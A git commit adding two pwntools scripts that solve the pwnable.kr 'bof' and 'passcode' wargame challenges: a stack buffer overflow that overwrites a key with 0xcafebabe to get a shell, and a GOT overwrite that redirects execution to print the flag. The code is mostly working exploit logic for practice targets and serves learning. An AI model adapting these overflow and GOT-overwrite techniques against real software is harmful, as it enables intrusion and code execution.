add pwnable.kr passcode solution

programmeruser2 · programmeruser2 · commit 801bdf7f4d23 · 2023-02-12T20:16:52.000-05:00
diff --git a/pwnable-kr-bof.py b/pwnable-kr-bof.py
@@ -0,0 +1,10 @@
+from pwn import *
+r = remote('pwnable.kr', 9000)
+# length of filler = (addr of key) - (addr of overflowme) = (ebp + 0x8) - (ebp - 0x2c) = 0x2c + 0x8
+payload = bytearray([ord('a')] * (0x2c + 0x8))
+payload.extend(p32(0xcafebabe))
+print(payload)
+r.sendline(payload)
+r.interactive()
+# now we have an interactive shell
+# run cat flag to get the flag now
diff --git a/pwnable-kr-passcode.py b/pwnable-kr-passcode.py
@@ -0,0 +1,13 @@
+from pwn import *
+#code = bytes(asm(shellcraft.i386.linux.exit(0)))
+#print(code)
+#iprint(u64(code))
+r = ssh(host='pwnable.kr', port=2222, user='passcode', password='guest')
+p = r.process('./passcode')
+#print(bytes([ord('a')] * 0x60) + p32(0x804a004))
+p.writeline(bytes([ord('a')] * 0x60) + p32(0x804a004))
+#print(str(0x80485d7).encode('ascii'))
+p.writeline(str(0x80485d7).encode('ascii'))
+p.interactive()
+# the flag will be written to output
+# it's the line before "Now I can safely trust you that you have credential :)"
